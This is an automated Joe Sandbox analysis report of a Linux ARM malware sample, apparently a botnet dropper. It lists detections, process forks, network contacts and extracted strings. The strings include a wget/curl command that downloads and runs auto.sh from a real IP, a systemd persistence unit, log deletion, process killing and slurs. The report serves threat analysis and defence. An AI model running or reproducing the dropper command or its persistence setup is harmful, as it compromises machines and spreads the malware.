Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.elf

Overview

General Information

Sample name:arm.elf
Analysis ID:1583046
MD5:c29418d4e5670276c4e09e8600327919
SHA1:3807e79f2a9ab460d41223775fcd03fd5b784c33
SHA256:278c03f07e3ca082c11f74e9b98c45aa12134e253f14f7fa2b58970077b78b1a
Tags:elfuser-abuse_ch
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Deletes system log files
Manipulation of devices in /dev
Sample deletes itself
Sends malformed DNS queries
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1583046
Start date and time:2025-01-01 17:02:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.elf
Detection:MAL
Classification:mal72.troj.evad.linELF@0/4@54/0
  • VT rate limit hit for: tcpdown.su
Command:/tmp/arm.elf
PID:6236
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
made you my bitch
Standard Error:
  • system is lnxubuntu20
  • arm.elf (PID: 6236, Parent: 6162, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.elf
    • arm.elf New Fork (PID: 6241, Parent: 6236)
      • arm.elf New Fork (PID: 6243, Parent: 6241)
        • arm.elf New Fork (PID: 6293, Parent: 6243)
        • arm.elf New Fork (PID: 6295, Parent: 6243)
        • arm.elf New Fork (PID: 6301, Parent: 6243)
        • arm.elf New Fork (PID: 6309, Parent: 6243)
        • arm.elf New Fork (PID: 6315, Parent: 6243)
        • arm.elf New Fork (PID: 6317, Parent: 6243)
        • arm.elf New Fork (PID: 6326, Parent: 6243)
        • arm.elf New Fork (PID: 6328, Parent: 6243)
        • arm.elf New Fork (PID: 6355, Parent: 6243)
        • arm.elf New Fork (PID: 6357, Parent: 6243)
        • arm.elf New Fork (PID: 6370, Parent: 6243)
        • arm.elf New Fork (PID: 6372, Parent: 6243)
        • arm.elf New Fork (PID: 6383, Parent: 6243)
        • arm.elf New Fork (PID: 6386, Parent: 6243)
        • arm.elf New Fork (PID: 6395, Parent: 6243)
        • arm.elf New Fork (PID: 6397, Parent: 6243)
        • arm.elf New Fork (PID: 6405, Parent: 6243)
        • arm.elf New Fork (PID: 6409, Parent: 6243)
        • arm.elf New Fork (PID: 6420, Parent: 6243)
        • arm.elf New Fork (PID: 6422, Parent: 6243)
        • arm.elf New Fork (PID: 6434, Parent: 6243)
        • arm.elf New Fork (PID: 6436, Parent: 6243)
        • arm.elf New Fork (PID: 6447, Parent: 6243)
        • arm.elf New Fork (PID: 6450, Parent: 6243)
        • arm.elf New Fork (PID: 6462, Parent: 6243)
        • arm.elf New Fork (PID: 6465, Parent: 6243)
        • arm.elf New Fork (PID: 6477, Parent: 6243)
        • arm.elf New Fork (PID: 6480, Parent: 6243)
        • arm.elf New Fork (PID: 6489, Parent: 6243)
        • arm.elf New Fork (PID: 6492, Parent: 6243)
        • arm.elf New Fork (PID: 6494, Parent: 6243)
        • arm.elf New Fork (PID: 6506, Parent: 6243)
        • arm.elf New Fork (PID: 6508, Parent: 6243)
        • arm.elf New Fork (PID: 6521, Parent: 6243)
        • arm.elf New Fork (PID: 6526, Parent: 6243)
        • arm.elf New Fork (PID: 6535, Parent: 6243)
        • arm.elf New Fork (PID: 6536, Parent: 6243)
        • arm.elf New Fork (PID: 6546, Parent: 6243)
        • arm.elf New Fork (PID: 6549, Parent: 6243)
      • arm.elf New Fork (PID: 6244, Parent: 6241)
        • arm.elf New Fork (PID: 6249, Parent: 6244)
      • arm.elf New Fork (PID: 6247, Parent: 6241)
      • sh (PID: 6247, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"
        • sh New Fork (PID: 6251, Parent: 6247)
        • systemctl (PID: 6251, Parent: 6247, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • arm.elf New Fork (PID: 6266, Parent: 6241)
      • sh (PID: 6266, Parent: 6241, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"
        • sh New Fork (PID: 6268, Parent: 6266)
        • systemctl (PID: 6268, Parent: 6266, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service
  • systemd New Fork (PID: 6253, Parent: 6252)
  • snapd-env-generator (PID: 6253, Parent: 6252, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 6272, Parent: 6271)
  • snapd-env-generator (PID: 6272, Parent: 6271, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • sh (PID: 6284, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
  • gsd-rfkill (PID: 6284, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill
  • gdm3 New Fork (PID: 6289, Parent: 1320)
  • Default (PID: 6289, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6290, Parent: 1320)
  • Default (PID: 6290, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm.elfAvira: detected
Source: arm.elfVirustotal: Detection: 50%Perma Link
Source: arm.elfReversingLabs: Detection: 52%
Source: arm.elfString: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: arm.elfString: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: arm.elfString: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.drString: ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Networking

barindex
Source: global trafficDNS traffic detected: malformed DNS query: tcpdown.suo. [malformed]
Source: global trafficTCP traffic: 192.168.2.23:59322 -> 23.94.37.42:2601
Source: global trafficTCP traffic: 192.168.2.23:57100 -> 107.175.130.16:7722
Source: /tmp/arm.elf (PID: 6236)Socket: 127.0.0.1:39123Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: unknownTCP traffic detected without corresponding DNS query: 107.175.130.16
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.su|1
Source: global trafficDNS traffic detected: DNS query: tcpdown.su
Source: global trafficDNS traffic detected: DNS query: tcpdown.suo. [malformed]
Source: startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh
Source: arm.elf, startup_command.service.13.drString found in binary or memory: http://154.216.18.192/auto.sh;
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: busybox
Source: Initial sampleString containing 'busybox' found: cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sampleString containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe//mnt/root/dev/consolew/etc/systemd/system/startup_command.service[Unit]
Source: Initial sampleString containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 721, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 904, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 912, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 918, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 936, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 1601, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 1638, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 1877, result: successfulJump to behavior
Source: /tmp/arm.elf (PID: 6244)SIGKILL sent: pid: 6284, result: successfulJump to behavior
Source: classification engineClassification label: mal72.troj.evad.linELF@0/4@54/0

Data Obfuscation

barindex
Source: /tmp/arm.elf (PID: 6243)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6284)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6284)Directory: <invalid fd (8)>/..Jump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6244)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/arm.elf (PID: 6247)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/arm.elf (PID: 6266)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 6251)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6268)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/arm.elf (PID: 6243)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/arm.elf (PID: 6236)File: /tmp/arm.elfJump to behavior
Source: /tmp/arm.elf (PID: 6236)Queries kernel information via 'uname': Jump to behavior
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6536.1.00007fe7f0034000.00007fe7f0045000.rw-.sdmpBinary or memory string: $/tmp/vmware-root_721-4290559889,
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: p$0!/proc/79/cmdline1/tmp/vmware-root_721-4290559889
Source: arm.elf, 6236.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6293.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6295.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6301.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6309.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6315.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6317.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6326.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6328.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6355.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6357.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6370.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6372.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6383.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6386.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6395.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6397.1.0000559078878000.00005590789c7000.rw-.sdmp, arm.elf, 6405.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmware/VGAuthP0/var/lib/vmware/VGAuth/aliasStoreQ@y
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /arm/var/lib/vmware/VGAuth
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmware
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6236.1.00007fff5e743000.00007fff5e764000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.q2hIrL:U
Source: arm.elf, 6536.1.00007fe7f0045000.00007fe7f0250000.rw-.sdmpBinary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: U/arm/var/lib/vmware/VGAuth/aliasStoreP /var/lib/PackageKitQ
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: P /var/lib/vmwareQPx
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: P /var/lib/vmware/VGAuthQ
Source: arm.elf, 6536.1.00007fe7f0034000.00007fe7f0045000.rw-.sdmpBinary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889P/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i4/tmp/snap.lxd
Source: arm.elf, 6536.1.00007fe7f0045000.00007fe7f0250000.rw-.sdmpBinary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: arm.elf, 6536.1.0000559078878000.00005590789c7000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
Source: arm.elf, 6236.1.00007fff5e743000.00007fff5e764000.rw-.sdmpBinary or memory string: /tmp/qemu-open.q2hIrL
